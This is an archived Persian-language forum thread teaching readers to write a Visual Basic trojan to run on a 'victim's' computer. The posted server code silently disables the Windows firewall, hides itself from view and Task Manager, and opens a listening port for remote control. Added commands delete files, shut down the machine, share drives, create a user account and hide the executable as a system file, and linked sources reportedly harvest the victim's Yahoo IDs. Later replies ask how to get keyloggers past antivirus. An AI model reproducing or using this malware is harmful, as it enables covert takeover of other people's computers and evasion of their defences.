Parsi Coders

نسخه‌ی کامل: تایپیک جامع تروجان نویسی +
شما در حال مشاهده نسخه آرشیو هستید. برای مشاهده نسخه کامل کلیک کنید.
صفحات: 1 2
با تشکر از Amin_mansouri که به من اجازه داد تایپیک تروجان نویسی رو راه بندازمtajob

تروجان از دو فایل سرور و کلاینت ساخته شده که برنامه ی کلاینت برای شماس و برنامه سرور برای قربانیه

که از طریق این دو فایل باهم ارتباط برقرار میکنید مثلا ( چت کردن , کنترل سیستم قربانی , .............. )

خب حالا شروع میکنیم به نوشتن سورس تروجان اول از قسمت سرور شروع میکنیم.


وقتی قربانی برنامه ی سرور رو اجرا کنه برنامه یک پورت رو که به دلخواه شماس رو کامپیوتر هدف باز میکنه تا برنامه ی کلاینت شما به ایپی و پورت کانکت بشه منتها فایروال سیستم به باز شدن پورت گیر میده و ما با این کد فایروال سیستم رو خاموش میکنیم

Private Sub Form_Load()
Shell "netsh firewall set opmode disable", vbHide
End Sub

برای پنهان بودن برنامه از کدای زیر استفاده میکنیم


Private Sub Form_Load()
از کار انداختن فایروال ویندوز Shell "netsh firewall set opmode disable", vbHide
پنهان بودن برنامه Form1.Hide
پنهان بودن برنامه در تسک منیجر App.TaskVisible = False
end sub

حالا باید درون فرم یه کنترل winsock بزاریم و در قسمت فرم لود کد های زیر را بگزاریم

Me.Winsock1.LocalPort = 1010
Me.Winsock1.Listen

خط اول یک پورت را به وینسوک میشناسونیم مثلا 1010 و خط دووم یعنی پورت مورد نظررو باز کن و به آن گوش بده , حواستون باشه این کدا رو در فرم لود بزارید

حالا در درون فرم 2 تا Textbox و یک command درست کنید و caption دکمتونو send بزارید

در داخل دکمه ی ارسال این کد رو قرار بدید

Private Sub Command1_Click()
Me.Winsock1.SendData Me.Text1.Text
Me.Text1.Text = ""
End Sub
با این کد نوشته های داخل text1 به برنامه ی دووم یعنی کلاینت فرستاده میشه

و کد پایین نوشتهایی که کلاینت میفرسته درون text2 قرار میده


Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim myd As String
Me.Winsock1.GetData myd, vbString
Me.Text2.Text = myd
End Sub
کد پایین از خطا جلو گیری میکنه

If Me.Winsock1.State <> sckConnected Then Me.Winsock1.Close
Me.Winsock1.Accept requestID
End Sub


Private Sub Winsock1_Close()
Me.Winsock1.Close
Me.Winsock1.Listen
End Sub



حالا میرسیم به اینجا که وقتی قربانی سرور رو باز میکنه هیچی بالا نمیاد پس چجوری پیامی که ما براش میفرستیمو ببینه یا برامون پیام بفرسته

ما در برنامه ی کلاینتمون که در آینده یاد میدم 2 تا دکمه داریم یکی به اسم Show Chat و دومی Hide Chat

دکمه اول رو که بزنیم فرم chat برای قربانی باز میشه و میتونه با ما چت کنه یا ما با اون و دکمه ی دوم فرم چت رو قایم میکنه برای این کار شما این کد هارو به برنامه ی سرور اضافه کنید



Private Sub Text2_Change()
If Me.Text2.Text = "SHOW FORM" Then
Form1.Show
Me.Text2.Text = ""
End If
If Me.Text2.Text = "HIDE FORM" Then
Form1.Hide
Me.Text2.Text = ""
End If
End Sub

خب حالا دیگه سرور ما حاضره اینم سورسش



خب حالا دیگه رسیدیم به بخش کلاینت. چون کد های اساسی رو یاد دادم دیگه کد های کلاینتو یاد نمیدم سورسشو میزارم تا خودتون ببینید
الان یه تروجان داریم که میتونیم به وسیله ی اون با قربانی چت کنیم ایشالا من این تروجانو پیشرفته تر میکنم جوری که بشه با command prompt قربانی کارکرد

برای وصل شدن به command prompt کدهای زیادی هست که ناقص هستند

مثلا یکیش همون استفاده از تابع shell هست که کاملا ناقصه البته سورس کامل ارتباط با cmd هست منتها اونم خیلی پیچیدس

این سورس رو با اینکه سادس ولی با خلاقیت درست کردم کارشم همون ارتباظ با cmd



دستوراتی که توی عکس میبینید رو میشه با استفاده از دستور شرطی IF در text1.change در برنامه ی server گذاشت
اینم سورسش
بچه ها از کدای زیر برای تروجان استفاده کنید جالبه


Kill patch برای پاک کردن فایل یا فولدر

این کد کامپیوترو خاموش میکنه Shell Shutdown -s
Shell Shutdown -r این کد کامپیوترو ریستارت میکنه
ُShell Shutdown -l این کد کامپیوترو logoff میکنه


Shell net share boof=DriveName این دستور درایو موردنظرو تو کامپیوتر share میکنه.
Shell net user boof 1234 /add این دستور در کامپیوتر یه یوزر به اسم بوف با پسورد 1234 ایجاد میکنه


http://www.parsicoders.com/attachment.php?aid=284 البته با این سورس کد میتونید یوزر مخفی ایجاد کنید


با کد پایین میتونید مکان موس رو عوض کنید

Private Declare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long

SetCursorPos 0, 0
SetCursorPos 1151, 0


SetAttr "c:\trojan.exe", vbhidden + vbsystem این کد برنامه رو هیدن میکنه بصورت سیستمی





دیگه فقط مونده تبادل اطلاعات بین دو کامپیوتر یا همون FTP یه سورس براتون میزارم

اگه چیزه جدیدیم پیدا کردم پست میدم , اگرم سوال داشتین در خدمتم.
اینم یه سورس خیلی کاربردی با این سورس میتونید آیدی هایی که قربانی به یاهو لاگین شده پیدا کنید سورسش ساده نوشتم خیلی ابتدایی , تازه بدرد ویروس نویساهم میخوره
باتشکر از پست مفیدتون سوالی داشتم اکثر ویروس کش به کیلاگر گیر میده و کلید های تایپ شده راهی روشی سورسی هست که آنتی ویروس گیر نده یا غیر فعال بشه
کسی نبوددددد
سلام
اکثر انتی ویروس ها به کرم های گیر میدن که کپی شده باشه
یعنی یه سورس کیلاگر توی اینترنت باشه شما بیایی واسه خودت کنی
تکنیک برنامه نویسی روش های نوشتن مهمه که باید با نحوه اسکن کردن انتی ها اشنا بشی
و بتونی روش های ابداع کنی که انتی دور بزنی
 
منظور بنده هم همین بود از چه روشی استفاده کنیم برای کد نویسی ؟
صفحات: 1 2